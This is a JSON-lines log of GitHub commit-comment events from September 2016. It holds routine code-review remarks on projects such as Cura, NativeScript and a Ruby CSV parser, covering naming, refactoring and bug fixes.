{"id":"4572817327","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19050514,"position":43,"line":27,"path":"resources/views/committee/members.blade.php","commit_id":"19ecff79eb272c295361c951fd8f4e92545856c4","created_at":"2016-09-16T08:36:52Z","updated_at":"2016-09-16T08:36:52Z","body":"Why was this line removed?"}},"created_at":"2016-09-16T08:36:52Z"}
{"id":"4572817368","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19050515,"position":null,"line":null,"path":null,"commit_id":"9cd6a8c1ae2ad2af5ec56e0dbf6852f3ebf9e005","created_at":"2016-09-16T08:36:53Z","updated_at":"2016-09-16T08:36:53Z","body":"I think it's best to keep these separate. The one name is for the user\nwhile the other is for the printer.\n\nI can duplicate a json to My Uber Ultimaker 2, but then the model type sent\nto the printer should still be Ultimaker 2\n\nOp 16 sep. 2016 10:19 schreef \"Ghostkeeper\" <notifications@github.com>:\n\n> No, what I meant was the \"name\" that it says below \"version\", right here:\n>\n> \"id\": \"uniqbot_one\",\n> \"version\": 2,\n> \"name\": \"Uniqbot\",\n>\n> It's duplicating information now, but removing that name has vast\n> implications for Uranium.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/Ultimaker/Cura/commit/9cd6a8c1ae2ad2af5ec56e0dbf6852f3ebf9e005#commitcomment-19050336>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AIe9ER_WEgcRbNwQtdJFW0hQ0X-hJxuzks5qqlD_gaJpZM4J8jdd>\n> .\n>\n"}},"created_at":"2016-09-16T08:36:53Z"}
{"id":"4572819742","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19050519,"position":15,"line":69,"path":"runtime/src/main/jni/CallbackHandlers.cpp","commit_id":"7f135764cad7fa6441028d380f8f7fa522947197","created_at":"2016-09-16T08:37:31Z","updated_at":"2016-09-16T08:37:31Z","body":"For a later implementation of the serialization we might thing about using [this](https://developer.mozilla.org/en-US/docs/Web/API/Web_Workers_API/Structured_clone_algorithm) instead of JSON.stringify, the main reason being the resolution of the cyclic graphs of references."}},"created_at":"2016-09-16T08:37:31Z"}
{"id":"4572820305","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/artwork-maia"},"payload":{"comment":{"id":19050520,"position":null,"line":null,"path":null,"commit_id":"1943363ca94ebc93829ebaaccf318b2a6d4a0021","created_at":"2016-09-16T08:37:39Z","updated_at":"2016-09-16T08:37:39Z","body":"User rev offered this dark variant of the icons. They work very nicely with dark themes, namely the small and symbolic icons, where the original ones are practically invisible.\r\nI'm not sure how to integrate them properly with Makefile and such for Plasma.\r\nIn any case we could alternatively just create a conventional separate **maia-icon-theme-dark** package for all DEs.\r\nLet me know how to best proceede @philmmanjaro ?"}},"created_at":"2016-09-16T08:37:39Z"}
{"id":"4572822404","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"kevva/screenshot-stream"},"payload":{"comment":{"id":19050524,"position":5,"line":71,"path":"index.js","commit_id":"59990b5c0787993b0efee72a97cbb510487d08c8","created_at":"2016-09-16T08:38:13Z","updated_at":"2016-09-16T08:38:13Z","body":"When you do this it's useful to add a TODO comment to deprecate it in the next major version, which would be v5."}},"created_at":"2016-09-16T08:38:13Z"}
{"id":"4572825812","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050530,"position":36,"line":36,"path":"spec/extra/csv_parser_spec.rb","commit_id":"5a214aa640c6edd43eecf5b8ee25abd1c83a573c","created_at":"2016-09-16T08:39:05Z","updated_at":"2016-09-16T08:39:05Z","body":"added later"}},"created_at":"2016-09-16T08:39:05Z"}
{"id":"4572832477","type":"CommitCommentEvent","actor":{"login":"xavcz"},"repo":{"name":"Air2air/Telescope"},"payload":{"comment":{"id":19050544,"position":null,"line":null,"path":null,"commit_id":"a9203f62a3528f94f25ad03d246f42df8d2d02bf","created_at":"2016-09-16T08:40:44Z","updated_at":"2016-09-16T08:40:44Z","body":"Mmmh having your own package for all the components may not be the best, you should extend the components instead (there are some already extended in `truvote-logic`)\r\n\r\nMore infos: https://www.youtube.com/watch?v=bSG9tMicUbg"}},"created_at":"2016-09-16T08:40:44Z"}
{"id":"4572842443","type":"CommitCommentEvent","actor":{"login":"Pip3r4o"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19050558,"position":15,"line":69,"path":"runtime/src/main/jni/CallbackHandlers.cpp","commit_id":"7f135764cad7fa6441028d380f8f7fa522947197","created_at":"2016-09-16T08:43:16Z","updated_at":"2016-09-16T08:43:16Z","body":"Absolutely, it's on the TODOs, but this should be sufficient for the time being."}},"created_at":"2016-09-16T08:43:16Z"}
{"id":"4572843444","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050560,"position":22,"line":23,"path":"app/extra/csv_parser.rb","commit_id":"3899712510e1702eaccb6e597c5b1b5df8432bf6","created_at":"2016-09-16T08:43:31Z","updated_at":"2016-09-16T08:43:31Z","body":"Yeah.\r\n\r\nFor us, (being a team with a couple of devs, expecting to have new colleagues, and a lot of changes on the code), that kind of \"must be careful with changes in class A because it will introduce bugs or security holes in class B\" debt is one of the things we strive to avoid."}},"created_at":"2016-09-16T08:43:31Z"}
{"id":"4572844206","type":"CommitCommentEvent","actor":{"login":"wonglkd"},"repo":{"name":"CUMSA/members"},"payload":{"comment":{"id":19050562,"position":null,"line":null,"path":null,"commit_id":"19ecff79eb272c295361c951fd8f4e92545856c4","created_at":"2016-09-16T08:43:43Z","updated_at":"2016-09-16T08:43:43Z","body":"1. Hmm, I'm not sure what you were trying to accomplish with your changes in `members.blade.php` - do you mind sharing? The change in indentation and the subsequent diff made it quite hard to see which code was changed and which was not. You could consider making the indentation change in its own commit to make it easier to see. You can amend your previous commit btw, or even commits before that (that's more complicated, but it's helpful to learn how to do it because it's only a matter of time before you need it) -- see https://www.atlassian.com/git/tutorials/rewriting-history/git-commit--amend\r\n2. Which lines corresponds to this?\r\n3. Having a form and submission is one way to do it.\r\n\r\nThe hiding/showing should be done completely in JavaScript without requiring a form POST submission or page reload - essentially, have a `onchange` event on the checkbox that when fired, checks the value of the checkbox and calls the show/hide javascript method.\r\n\r\nThe quick hack way that I would use is to utilise HTML5 storage as a stop gap solution to store the user's preference. This way, it's all done in JavaScript and one doesn't need to touch the backend - pretty quick and neat. The disadvantage of not storing it in DB is that settings are going to be specific to the browser and will not be portable across computers - but it might be a disadvantage that you can live with for now (after all, your committee members are the only ones affected and they will probably use the same computer to access the page - and if they don't, it's not *too* much hassle to click a few checkboxes)."}},"created_at":"2016-09-16T08:43:43Z"}
{"id":"4572849129","type":"CommitCommentEvent","actor":{"login":"fnoks"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19050572,"position":5,"line":139,"path":"scripts/h5peditor-dimensions.js","commit_id":"c70cac28c9171f2ccc7a3765b02196a6547e1b62","created_at":"2016-09-16T08:45:00Z","updated_at":"2016-09-16T08:45:00Z","body":"I have tested using the Drag Question editor. Do you see any problems with this implementation?"}},"created_at":"2016-09-16T08:45:00Z"}
{"id":"4572850412","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19050579,"position":7,"line":253,"path":"src/utils/polygon.h","commit_id":"72e4bf8069f50ab8b4e11552d5eac29424bfda88","created_at":"2016-09-16T08:45:20Z","updated_at":"2016-09-16T08:45:20Z","body":"Maximum can be both, but what I meant was the semantic difference. Maximal tends to refer to something like a local maximum[[1]](http://english.stackexchange.com/a/38267) or just something very big."}},"created_at":"2016-09-16T08:45:20Z"}
{"id":"4572852358","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"schismtracker/schismtracker"},"payload":{"comment":{"id":19050584,"position":null,"line":null,"path":null,"commit_id":"85a0996b481b32362fef6652ffc307679d82fb85","created_at":"2016-09-16T08:45:49Z","updated_at":"2016-09-16T08:45:49Z","body":"You don't need the ```else``` because ```return 1``` makes it abort."}},"created_at":"2016-09-16T08:45:49Z"}
{"id":"4572853431","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050586,"position":21,"line":22,"path":"app/extra/csv_parser.rb","commit_id":"3899712510e1702eaccb6e597c5b1b5df8432bf6","created_at":"2016-09-16T08:46:06Z","updated_at":"2016-09-16T08:46:06Z","body":"Yeah, I'm curious about the naming.\r\n\r\nSince in our platform we have both XML and CSV feeds, I think this sanitization would apply to both cases with exactly the same logic. So I wonder why \"csv\" and \"row\" are locked in the method name, while the code itself does not use anything of those concepts."}},"created_at":"2016-09-16T08:46:06Z"}
{"id":"4572857342","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19050610,"position":null,"line":null,"path":null,"commit_id":"c6f6dcc919e99a6e4b7e334618ca2d960832086a","created_at":"2016-09-16T08:47:05Z","updated_at":"2016-09-16T08:47:05Z","body":"OMIT"}},"created_at":"2016-09-16T08:47:05Z"}
{"id":"4572857601","type":"CommitCommentEvent","actor":{"login":"kevva"},"repo":{"name":"kevva/screenshot-stream"},"payload":{"comment":{"id":19050611,"position":5,"line":71,"path":"index.js","commit_id":"59990b5c0787993b0efee72a97cbb510487d08c8","created_at":"2016-09-16T08:47:09Z","updated_at":"2016-09-16T08:47:09Z","body":"I guess :)."}},"created_at":"2016-09-16T08:47:09Z"}
{"id":"4572861625","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050618,"position":4,"line":4,"path":"app/extra/csv_parser.rb","commit_id":"2fbb3ec379152bdfbf615f23123e75fe663af7a2","created_at":"2016-09-16T08:48:07Z","updated_at":"2016-09-16T08:48:07Z","body":"Can we decouple that somehow? It would be nice to be able, for example, to enter the rails console and update from any file/string"}},"created_at":"2016-09-16T08:48:07Z"}
{"id":"4572864811","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":19050623,"position":5,"line":139,"path":"scripts/h5peditor-dimensions.js","commit_id":"c70cac28c9171f2ccc7a3765b02196a6547e1b62","created_at":"2016-09-16T08:48:53Z","updated_at":"2016-09-16T08:48:53Z","body":"When I try to use the Drag Question Editor I get the following error message: _Please specify task size first._"}},"created_at":"2016-09-16T08:48:53Z"}
{"id":"4572865074","type":"CommitCommentEvent","actor":{"login":"gadgetsgalaxy"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19050624,"position":null,"line":null,"path":null,"commit_id":"db7ad8647dbb51a3c3bcbe15dd98a65081cd53f3","created_at":"2016-09-16T08:48:56Z","updated_at":"2016-09-16T08:48:56Z","body":"ok\n\nWould be nice if instead of pause when full heroes.\n\nIt will auto power up using 1-3 stars fodders. \n\nexample 1* to 3*, 2* to 4*, 3* to 5*\n\n:)\n\n\nJust a suggestion if you have the time.\n\n\n> On 16 Sep 2016, at 3:36 PM, dreammed <notifications@github.com> wrote:\n> \n> i found a bug i will release at night\n> need more work with Tesseractor\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/dreammed/SevenKnightsAI/commit/db7ad8647dbb51a3c3bcbe15dd98a65081cd53f3#commitcomment-19049854>, or mute the thread <https://github.com/notifications/unsubscribe-auth/ASkvtzG4PR9IFNYcZHPZExe__VUUbF9dks5qqkcNgaJpZM4J-Np8>.\n> \n\n"}},"created_at":"2016-09-16T08:48:56Z"}
{"id":"4572865541","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050627,"position":20,"line":20,"path":"app/extra/csv_parser.rb","commit_id":"2fbb3ec379152bdfbf615f23123e75fe663af7a2","created_at":"2016-09-16T08:49:04Z","updated_at":"2016-09-16T08:49:04Z","body":"Yeah, it was nice to see that.\r\n\r\nHow did debug the code at this step?"}},"created_at":"2016-09-16T08:49:04Z"}
{"id":"4572865802","type":"CommitCommentEvent","actor":{"login":"tomoaki0705"},"repo":{"name":"opencv/opencv"},"payload":{"comment":{"id":19050631,"position":null,"line":null,"path":null,"commit_id":"c5d7791b67cb2810bff9a3123f9f640e5dcc7530","created_at":"2016-09-16T08:49:07Z","updated_at":"2016-09-16T08:49:07Z","body":"@hkozachkov , could you have a look if #7294 fix your problem, please ?"}},"created_at":"2016-09-16T08:49:07Z"}
{"id":"4572869222","type":"CommitCommentEvent","actor":{"login":"wilkinsona"},"repo":{"name":"snicoll/spring-boot"},"payload":{"comment":{"id":19050643,"position":4,"line":70,"path":"spring-boot-test/src/main/java/org/springframework/boot/test/mock/mockito/MockBean.java","commit_id":"e9a0500c48a73f0bafdae11bf0d422b710156434","created_at":"2016-09-16T08:49:55Z","updated_at":"2016-09-16T08:49:55Z","body":"Should be \"is\" rather than \"are\"."}},"created_at":"2016-09-16T08:49:55Z"}
{"id":"4572871051","type":"CommitCommentEvent","actor":{"login":"girish26"},"repo":{"name":"girish26/session-management"},"payload":{"comment":{"id":19050647,"position":null,"line":null,"path":null,"commit_id":"81c13a88860c955e728082798745167556d43b9d","created_at":"2016-09-16T08:50:20Z","updated_at":"2016-09-16T08:50:20Z","body":"session doFilter small issue solved\r\n"}},"created_at":"2016-09-16T08:50:20Z"}
{"id":"4572872508","type":"CommitCommentEvent","actor":{"login":"wilkinsona"},"repo":{"name":"snicoll/spring-boot"},"payload":{"comment":{"id":19050651,"position":4,"line":70,"path":"spring-boot-test/src/main/java/org/springframework/boot/test/mock/mockito/SpyBean.java","commit_id":"e9a0500c48a73f0bafdae11bf0d422b710156434","created_at":"2016-09-16T08:50:40Z","updated_at":"2016-09-16T08:50:40Z","body":"\"is\" rather than \"are\""}},"created_at":"2016-09-16T08:50:40Z"}
{"id":"4572874327","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050654,"position":36,"line":36,"path":"spec/extra/csv_parser_spec.rb","commit_id":"5a214aa640c6edd43eecf5b8ee25abd1c83a573c","created_at":"2016-09-16T08:51:07Z","updated_at":"2016-09-16T08:51:07Z","body":"👍 "}},"created_at":"2016-09-16T08:51:07Z"}
{"id":"4572878735","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/artwork-maia"},"payload":{"comment":{"id":19050662,"position":null,"line":null,"path":null,"commit_id":"1943363ca94ebc93829ebaaccf318b2a6d4a0021","created_at":"2016-09-16T08:52:11Z","updated_at":"2016-09-16T08:52:11Z","body":"https://github.com/manjaro/artwork-maia/issues/8 https://github.com/manjaro/artwork-maia/issues/12"}},"created_at":"2016-09-16T08:52:11Z"}
{"id":"4572887062","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19050683,"position":3,"line":3,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T08:54:11Z","updated_at":"2016-09-16T08:54:11Z","body":"1. `temp_list` is an unhelpful name.\r\n\r\n2. This could have been written as:\r\n\r\n```python\r\nrows = [row.strip() for row in rows]\r\n```"}},"created_at":"2016-09-16T08:54:11Z"}
{"id":"4572891007","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050696,"position":21,"line":22,"path":"app/extra/csv_parser.rb","commit_id":"3899712510e1702eaccb6e597c5b1b5df8432bf6","created_at":"2016-09-16T08:55:08Z","updated_at":"2016-09-16T08:55:08Z","body":"Yes, but this app doesn't handle XML. I agree that it's coupled, but for the current use case it's fine. If we had multiple parsers, the method would be extracted and moved to a module that could be included in each parsers, so having a different name would not mean there would no changes required."}},"created_at":"2016-09-16T08:55:08Z"}
{"id":"4572892026","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19050702,"position":7,"line":7,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T08:55:21Z","updated_at":"2016-09-16T08:55:21Z","body":"Would be nice to document what this for loop is doing."}},"created_at":"2016-09-16T08:55:21Z"}
{"id":"4572894884","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050712,"position":20,"line":20,"path":"app/extra/csv_parser.rb","commit_id":"2fbb3ec379152bdfbf615f23123e75fe663af7a2","created_at":"2016-09-16T08:56:00Z","updated_at":"2016-09-16T08:56:00Z","body":"How did I debug the code? running it in the console. "}},"created_at":"2016-09-16T08:56:00Z"}
{"id":"4572898585","type":"CommitCommentEvent","actor":{"login":"wojur"},"repo":{"name":"Not-the-same-sky/Tata"},"payload":{"comment":{"id":19050720,"position":null,"line":null,"path":null,"commit_id":"eb347d7f4f639efff457447fc42edb85f4fab381","created_at":"2016-09-16T08:56:52Z","updated_at":"2016-09-16T08:56:52Z","body":"future message"}},"created_at":"2016-09-16T08:56:52Z"}
{"id":"4572902347","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19050726,"position":9,"line":9,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T08:57:44Z","updated_at":"2016-09-16T08:57:44Z","body":"`first_checker` is the third distinct name you're giving to a row."}},"created_at":"2016-09-16T08:57:44Z"}
{"id":"4572903950","type":"CommitCommentEvent","actor":{"login":"SanderDevisscher"},"repo":{"name":"SanderDevisscher/SK_Analyse"},"payload":{"comment":{"id":19050732,"position":9,"line":9,"path":"ANa.R","commit_id":"a2aac602ef41552b0ee42deb5aa62fde0bc1d88c","created_at":"2016-09-16T08:58:08Z","updated_at":"2016-09-16T08:58:08Z","body":"#"}},"created_at":"2016-09-16T08:58:08Z"}
{"id":"4572908001","type":"CommitCommentEvent","actor":{"login":"Not-the-same-sky"},"repo":{"name":"Not-the-same-sky/Tata"},"payload":{"comment":{"id":19050746,"position":null,"line":null,"path":null,"commit_id":"eb347d7f4f639efff457447fc42edb85f4fab381","created_at":"2016-09-16T08:59:02Z","updated_at":"2016-09-16T08:59:02Z","body":"nice"}},"created_at":"2016-09-16T08:59:02Z"}
{"id":"4572912026","type":"CommitCommentEvent","actor":{"login":"legoboy0215"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":19050752,"position":null,"line":null,"path":null,"commit_id":"d5d6d04d80d586a64f26ebb46409c236db66f65b","created_at":"2016-09-16T08:59:55Z","updated_at":"2016-09-16T08:59:55Z","body":"Coded mostly by @PEMapModder lel"}},"created_at":"2016-09-16T08:59:55Z"}
{"id":"4572917717","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19050761,"position":16,"line":16,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:01:13Z","updated_at":"2016-09-16T09:01:13Z","body":"`range` implicitly starts at 0 by default."}},"created_at":"2016-09-16T09:01:13Z"}
{"id":"4572918200","type":"CommitCommentEvent","actor":{"login":"sommer"},"repo":{"name":"sommer/veins"},"payload":{"comment":{"id":19050763,"position":null,"line":null,"path":null,"commit_id":"89c8a10443779b737b475da86e5f7227a1d9c42d","created_at":"2016-09-16T09:01:19Z","updated_at":"2016-09-16T09:01:19Z","body":"I don't see any windows opening when I run a simulation, so I guess not."}},"created_at":"2016-09-16T09:01:19Z"}
{"id":"4572919483","type":"CommitCommentEvent","actor":{"login":"wojur"},"repo":{"name":"Not-the-same-sky/Tata"},"payload":{"comment":{"id":19050765,"position":null,"line":null,"path":null,"commit_id":"eb347d7f4f639efff457447fc42edb85f4fab381","created_at":"2016-09-16T09:01:37Z","updated_at":"2016-09-16T09:01:37Z","body":"future"}},"created_at":"2016-09-16T09:01:37Z"}
{"id":"4572921950","type":"CommitCommentEvent","actor":{"login":"OneCrazyBoy"},"repo":{"name":"OneCrazyBoy/Java"},"payload":{"comment":{"id":19050771,"position":null,"line":null,"path":null,"commit_id":"a551dee11ad518993d87f2a4c6325ac5bf5d95bd","created_at":"2016-09-16T09:02:13Z","updated_at":"2016-09-16T09:02:13Z","body":"加油"}},"created_at":"2016-09-16T09:02:13Z"}
{"id":"4572922196","type":"CommitCommentEvent","actor":{"login":"OneCrazyBoy"},"repo":{"name":"OneCrazyBoy/Java"},"payload":{"comment":{"id":19050772,"position":null,"line":null,"path":null,"commit_id":"a551dee11ad518993d87f2a4c6325ac5bf5d95bd","created_at":"2016-09-16T09:02:16Z","updated_at":"2016-09-16T09:02:16Z","body":"加油"}},"created_at":"2016-09-16T09:02:16Z"}
{"id":"4572922293","type":"CommitCommentEvent","actor":{"login":"OneCrazyBoy"},"repo":{"name":"OneCrazyBoy/Java"},"payload":{"comment":{"id":19050773,"position":null,"line":null,"path":null,"commit_id":"a551dee11ad518993d87f2a4c6325ac5bf5d95bd","created_at":"2016-09-16T09:02:16Z","updated_at":"2016-09-16T09:02:16Z","body":"加油"}},"created_at":"2016-09-16T09:02:16Z"}
{"id":"4572922344","type":"CommitCommentEvent","actor":{"login":"OneCrazyBoy"},"repo":{"name":"OneCrazyBoy/Java"},"payload":{"comment":{"id":19050774,"position":null,"line":null,"path":null,"commit_id":"a551dee11ad518993d87f2a4c6325ac5bf5d95bd","created_at":"2016-09-16T09:02:17Z","updated_at":"2016-09-16T09:02:17Z","body":"加油"}},"created_at":"2016-09-16T09:02:17Z"}
{"id":"4572922395","type":"CommitCommentEvent","actor":{"login":"OneCrazyBoy"},"repo":{"name":"OneCrazyBoy/Java"},"payload":{"comment":{"id":19050775,"position":null,"line":null,"path":null,"commit_id":"a551dee11ad518993d87f2a4c6325ac5bf5d95bd","created_at":"2016-09-16T09:02:18Z","updated_at":"2016-09-16T09:02:18Z","body":"加油"}},"created_at":"2016-09-16T09:02:18Z"}
{"id":"4572925908","type":"CommitCommentEvent","actor":{"login":"networkimprov"},"repo":{"name":"networkimprov/linux"},"payload":{"comment":{"id":19050779,"position":null,"line":null,"path":null,"commit_id":"5e2a97e42c63a1b29117c9f1f93b1c041b865348","created_at":"2016-09-16T09:03:07Z","updated_at":"2016-09-16T09:03:07Z","body":"OMIT"}},"created_at":"2016-09-16T09:03:07Z"}
{"id":"4572926574","type":"CommitCommentEvent","actor":{"login":"ulysses26"},"repo":{"name":"ulysses26/DORA"},"payload":{"comment":{"id":19050781,"position":null,"line":null,"path":null,"commit_id":"597c5bceb4c34d544f5c8294d838fffecbb5e940","created_at":"2016-09-16T09:03:16Z","updated_at":"2016-09-16T09:03:16Z","body":"![image](https://cloud.githubusercontent.com/assets/6812944/18580631/684d55b8-7c05-11e6-85d0-49cc97bfbabf.png\r\n\r\nURGENT  > PRIORITY > ?"}},"created_at":"2016-09-16T09:03:16Z"}
{"id":"4572930727","type":"CommitCommentEvent","actor":{"login":"Plamen5kov"},"repo":{"name":"NativeScript/android-runtime"},"payload":{"comment":{"id":19050785,"position":112,"line":1166,"path":"runtime/src/main/jni/CallbackHandlers.cpp","commit_id":"c7d7c2c339ab257ddd8c20844758c6d62b46241a","created_at":"2016-09-16T09:04:16Z","updated_at":"2016-09-16T09:04:16Z","body":"consider using:  Exception::Error(Local<String> message);"}},"created_at":"2016-09-16T09:04:16Z"}
{"id":"4572933298","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19050791,"position":21,"line":21,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:04:53Z","updated_at":"2016-09-16T09:04:53Z","body":"Since `level[i]` is a string, this could have been\r\n```python\r\ntemp_string += level[i]\r\n```"}},"created_at":"2016-09-16T09:04:53Z"}
{"id":"4572935383","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19050814,"position":19,"line":19,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:05:22Z","updated_at":"2016-09-16T09:05:22Z","body":"Fourth name for a row."}},"created_at":"2016-09-16T09:05:22Z"}
{"id":"4572936021","type":"CommitCommentEvent","actor":{"login":"poloniculmov"},"repo":{"name":"poloniculmov/hammer"},"payload":{"comment":{"id":19050829,"position":4,"line":4,"path":"app/extra/csv_parser.rb","commit_id":"2fbb3ec379152bdfbf615f23123e75fe663af7a2","created_at":"2016-09-16T09:05:31Z","updated_at":"2016-09-16T09:05:31Z","body":"I could have separated csv parsing and object creation, but it didn't make that much sense since we don't have another use case. I guess I could have also changed the CSVs are loaded, as the current way actually requires a file."}},"created_at":"2016-09-16T09:05:31Z"}
{"id":"4572936385","type":"CommitCommentEvent","actor":{"login":"Joshi1998"},"repo":{"name":"nolimits4web/Framework7"},"payload":{"comment":{"id":19050839,"position":null,"line":null,"path":null,"commit_id":"76d768cadfab7331057d6ea87780d766129fbbdf","created_at":"2016-09-16T09:05:36Z","updated_at":"2016-09-16T09:05:36Z","body":"@CaoLeilei \r\nVery nice now the bug with the routing is fixed :)\r\nThanks!!!"}},"created_at":"2016-09-16T09:05:36Z"}
{"id":"4572937223","type":"CommitCommentEvent","actor":{"login":"SilverFire"},"repo":{"name":"yiisoft/yii2"},"payload":{"comment":{"id":19050858,"position":null,"line":null,"path":null,"commit_id":"13b10bdb9a30cd6d4cc61a76f70c26085e94a90b","created_at":"2016-09-16T09:05:47Z","updated_at":"2016-09-16T09:05:47Z","body":"@shining228 [Selecting extra fields](https://github.com/yiisoft/yii2/blob/master/docs/guide/db-active-record.md#selecting-extra-fields) section was recently updated by @klimov-"}},"created_at":"2016-09-16T09:05:47Z"}
{"id":"4572941654","type":"CommitCommentEvent","actor":{"login":"aik099"},"repo":{"name":"consolibyte/quickbooks-php"},"payload":{"comment":{"id":19050966,"position":26,"line":26,"path":"QuickBooks/IPP/Service/Attachable.php","commit_id":"3a6e25ec13e2411f38d7aa8b251801a206baa312","created_at":"2016-09-16T09:06:47Z","updated_at":"2016-09-16T09:06:47Z","body":"Was there any specific idea behind `parent::_query(` syntax VS `$this->_query(` syntax used in other services?"}},"created_at":"2016-09-16T09:06:47Z"}
{"id":"4572945630","type":"CommitCommentEvent","actor":{"login":"romanlevin"},"repo":{"name":"therhb/rekrutacja_egnyte"},"payload":{"comment":{"id":19051012,"position":21,"line":21,"path":"checker.py","commit_id":"cae9156fe5af7c73abf2281507b9f91837160946","created_at":"2016-09-16T09:07:36Z","updated_at":"2016-09-16T09:07:36Z","body":"Better yet, this could have been\r\n```python\r\ncolumn = ''.join(row[column_index] for row in rows)\r\n```\r\n\r\nDo you understand why? Aside from being shorter, I mean."}},"created_at":"2016-09-16T09:07:36Z"}
{"id":"4572948612","type":"CommitCommentEvent","actor":{"login":"dreammed"},"repo":{"name":"dreammed/SevenKnightsAI"},"payload":{"comment":{"id":19051025,"position":null,"line":null,"path":null,"commit_id":"db7ad8647dbb51a3c3bcbe15dd98a65081cd53f3","created_at":"2016-09-16T09:08:18Z","updated_at":"2016-09-16T09:08:18Z","body":"i found it and find way to fix\r\nnow i will release version to Tesseractor at 100/100 only quite accurate with 100/100\r\nbecause i got change auto profile everyday when i use this function at around moring\r\ni think it work but not accurate at all value but it use trigger only at 100/100 "}},"created_at":"2016-09-16T09:08:18Z"}
{"id":"4572951082","type":"CommitCommentEvent","actor":{"login":"mashers"},"repo":{"name":"mashers/3DSafe"},"payload":{"comment":{"id":19051037,"position":null,"line":null,"path":null,"commit_id":"5d962f94d6f3e60986f09bf174ee65fb9ed9e0c0","created_at":"2016-09-16T09:08:55Z","updated_at":"2016-09-16T09:08:55Z","body":"* If the lost.bin was successfully loaded from SD card, 3DSafe will then check if it exists on CTRNAND\r\n* If it does not exist on CTRNAND, 3DSafe copies it there\r\n* When booting without the SD card, 3DSafe will attempt to display the lost.bin from CTRNAND\r\n* This means that deleting lost.bin from the SD card will not prevent the contact details from being shown on startup"}},"created_at":"2016-09-16T09:08:55Z"}
{"id":"4572951257","type":"CommitCommentEvent","actor":{"login":"miclaus"},"repo":{"name":"fhstp-mfg/mobilot"},"payload":{"comment":{"id":19051039,"position":14,"line":28,"path":"public/app/modules/mobidul/station/creator/directives/EditorDirective.js","commit_id":"f785aa619aab82433a73cf66b04f660b3d603d81","created_at":"2016-09-16T09:08:58Z","updated_at":"2016-09-16T09:08:58Z","body":"Well I though that what if, there is a custom mode, where stations have a customisable `open` state content and when the station is completed, **the same** `completed` state content is shown.\r\n\r\nBut yes, this is only speculation. It's very ok for me to remove this option. 😄 Like I said, I'm not even sure it works correctly.\r\n\r\n**Todo**: We should remove this option and simply hide stations states if the Mobidul mode is `default` @doomsayer2. Thanks @abisz for drawing attention to this issue. 👍 "}},"created_at":"2016-09-16T09:08:58Z"}
